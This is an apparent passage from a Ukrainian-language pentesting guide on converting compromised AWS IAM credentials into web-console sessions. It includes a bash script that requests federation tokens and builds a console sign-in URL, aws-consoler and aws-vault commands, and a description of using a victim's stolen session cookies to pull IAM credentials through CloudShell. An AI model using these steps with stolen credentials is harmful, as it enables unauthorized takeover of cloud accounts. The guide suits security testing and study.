Якщо вам вдалося отримати деякі IAM облікові дані, ви можете бути зацікавлені в доступі до веб-консолі за допомогою наступних інструментів.
Зверніть увагу, що користувач/роль повинні мати дозвіл sts:GetFederationToken.
Користувацький скрипт
Наступний скрипт використовуватиме профіль за замовчуванням та стандартне місцезнаходження AWS (не gov і не cn), щоб надати вам підписане URL, яке ви можете використовувати для входу в веб-консолі:
# Get federated creds (you must indicate a policy or they won't have any perms)## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges## Don't forget to use [--profile <prof_name>] in the first line if you need tooutput=$(awsstsget-federation-token--nameconsoler--policy-arnsarn=arn:aws:iam::aws:policy/AdministratorAccess)if [ $? -ne0 ]; thenecho"The command 'aws sts get-federation-token --name consoler' failed with exit status $status"exit $statusfi# Parse the outputsession_id=$(echo $output |jq-r'.Credentials.AccessKeyId')session_key=$(echo $output |jq-r'.Credentials.SecretAccessKey')session_token=$(echo $output |jq-r'.Credentials.SessionToken')# Construct the JSON credentials stringjson_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")
# Define the AWS federation endpointfederation_endpoint="https://signin.aws.amazon.com/federation"# Make the HTTP request to get the sign-in tokenresp=$(curl-s"$federation_endpoint" \--get \--data-urlencode "Action=getSigninToken" \--data-urlencode "SessionDuration=43200" \--data-urlencode "Session=$json_creds")signin_token=$(echo-n $resp |jq-r'.SigninToken'|tr-d'\n'|jq-sRr@uri)# Give the URL to loginecho -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
cd/tmppython3-mvenvenvsource./env/bin/activatepipinstallaws-consoleraws_consoler [params...] #This will generate a link to login into the console
Переконайтеся, що IAM користувач має дозвіл sts:GetFederationToken, або надайте роль для прийняття.
aws-vault
aws-vault - це інструмент для безпечного зберігання та доступу до облікових даних AWS у середовищі розробки.
aws-vaultlistaws-vaultexecjonsmith--awss3ls# Execute aws cli with jonsmith credsaws-vaultloginjonsmith# Open a browser logged as jonsmith
Ви також можете використовувати aws-vault для отримання сесії консолі браузера
Від консолі до IAM облікових даних
Спочатку виявлено в цьому пості, якщо вам вдасться скомпрометувати доступ до веб-консолі (можливо, ви вкрали куки і не змогли отримати доступ до папки .aws), ви можете отримати деякі токени IAM для цього користувача через CloudShell.
CloudShell відкриває IAM облікові дані через недокументований кінцевий пункт на порту 1338. Після завантаження сесійних куків жертви у ваш браузер, ви можете перейти до CloudShell і виконати наступні команди, щоб отримати IAM облікові дані.